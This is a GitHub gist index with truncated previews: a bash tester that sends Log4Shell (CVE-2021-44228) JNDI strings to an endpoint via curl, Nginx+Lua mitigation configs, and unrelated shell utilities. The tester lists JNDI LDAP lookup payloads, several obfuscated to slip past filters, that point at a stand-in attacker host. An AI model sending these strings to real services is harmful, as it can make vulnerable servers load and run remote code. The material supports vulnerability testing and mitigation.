John H Patton johnhpatton

@johnhpatton
johnhpatton / cve-2021-44228-tester.sh
Last active December 15, 2021 14:08
Tests log4shell patterns against an endpoint using curl
declare -a PATTERNS=()
PATTERNS+=('${jndi:ldap:attacker_controled_website/payload_to_be_executed}')
PATTERNS+=('${j${k8s:k5:-ND}i${sd:k5:-:}}')
PATTERNS+=('${j${main:\k5:-Nd}i${spring:k5:-:}}')
PATTERNS+=('${j${sys:k5:-nD}${lower:i${web:k5:-:}}}')
PATTERNS+=('${j${::-nD}i${::-:}}')
PATTERNS+=('${j${EnV:K5:-nD}i:}')
PATTERNS+=('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}attacker_controled_website/payload_to_be_executed}')
PATTERNS+=('${j${loWer:Nd}i${uPper::}}')
PATTERNS+=('${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker_controled_website/payload_to_be_executed }')
@johnhpatton
johnhpatton / cve_2021_44228.lua
Created December 15, 2021 12:59
Nginx + Lua to mitigate CVE-2021-44228
-- -*- location: /etc/nginx/conf.d/cve_2021_44228.lua; -*-
-- -*- mode: lua; -*-
-- -*- author: John H Patton; -*-
-- -*- email: jhpattonconsulting@gmail.com; -*-
-- -*- license: MIT License; -*-
--
-- Copyright 2021 JH Patton Consulting, LLC
--
-- Permission is hereby granted, free of charge, to any person obtaining a copy of this
-- software and associated documentation files (the "Software"), to deal in the Software
@johnhpatton
johnhpatton / cve_2021_44228.lua
Last active December 19, 2021 17:19
Nginx + Lua to mitigate CVE-2021-44228
-- -*- location: /etc/nginx/conf.d/cve_2021_44228.lua; -*-
-- -*- mode: lua; -*-
-- -*- author: John H Patton; -*-
-- -*- email: jhpattonconsulting@gmail.com; -*-
-- -*- license: MIT License; -*-
--
-- Copyright 2021 JH Patton Consulting, LLC
--
-- Permission is hereby granted, free of charge, to any person obtaining a copy of this
-- software and associated documentation files (the "Software"), to deal in the Software
@johnhpatton
johnhpatton / default.conf
Created December 13, 2021 17:22
Nginx + Lua to mitigate CVE-2021-44228
# /etc/nginx/conf.d/default.conf
server {
    listen 80 default_server;
    server_name localhost;
    set $captured_request_headers "";
    set $captured_request_body "";
    set $cve_2021_44228_log "";
    rewrite_by_lua_block {
        cve_2021_44228.block_cve_2021_44228()
@johnhpatton
johnhpatton / lua.conf
Created December 13, 2021 11:17
Nginx + Lua to mitigate CVE-2021-44228
# /etc/nginx/conf.d/lua.conf
# GLOBAL LUA -- HTTP BLOCK LEVEL
# Lua locations
# $prefix is the server prefix ( -p {server_prefix} ) passed in
# to nginx at startup, or the default build prefix (/etc/nginx/).
lua_package_path "${prefix}conf.d/?.lua;/usr/local/lib/lua/?.lua;;";
lua_package_cpath "/usr/lib64/lua/5.1/?.so;;";
# Disable logging cosocket lua TCP socket read timeout.
@johnhpatton
johnhpatton / nginx.conf
Last active December 13, 2021 11:15
Nginx + Lua to mitigate CVE-2021-44228
# /etc/nginx/nginx.conf
# nginx plus implementation for RHEL hosts
load_module modules/ndk_http_module.so;
load_module modules/ngx_http_lua_module.so;
error_log /var/log/nginx/error.log error;
pid /var/run/nginx.pid;
lock_file /var/lock/nginx.lock;
worker_processes auto;
@johnhpatton
johnhpatton / .bashrc
Last active December 1, 2021 12:25
.bashrc with Active prompt
# To get the most out of this .bashrc, install bash 4.x or higher along with the following tools:
# figlet
# screenfetch
#
# On Mac, install bash via brew and update the shell for the user:
#
# brew install bash
# echo /usr/local/bin/bash | sudo tee -a /etc/shells
# chsh -s /usr/local/bin/bash
#
@johnhpatton
johnhpatton / simple-local-ca-cert.sh
Created April 3, 2021 22:10
Create a Local CA root certificate.
#!/usr/bin/env bash
# Create the CA root signing key
openssl genrsa -out "./ca.key" 2048
# Create the CA root certificate
openssl req -x509 -new -nodes \
    -days 3650 \
    -reqexts v3_req \
    -extensions v3_ca \
#!/usr/bin/env bash
get_bg_color() {
    local -n bg_color="$1"
    local ansi_sequence_query_bg='\e]11;?\e\'
    local cur_stty=$(stty -g)
    # enable stty raw echo
    stty raw -echo min 0 time 0
@johnhpatton
johnhpatton / terminal-get-bg-luminosity.sh
Created April 1, 2021 12:54
Gets terminal background luminosity with ANSI escape sequence to help select a foreground color palette
#!/usr/bin/env bash
get_bg_color() {
    local -n bg_color="$1"
    local ansi_sequence_query_bg='\e]11;?\e\'
    local cur_stty=$(stty -g)
    stty raw -echo min 0 time 0
    printf "%b" "${ansi_sequence_query_bg}"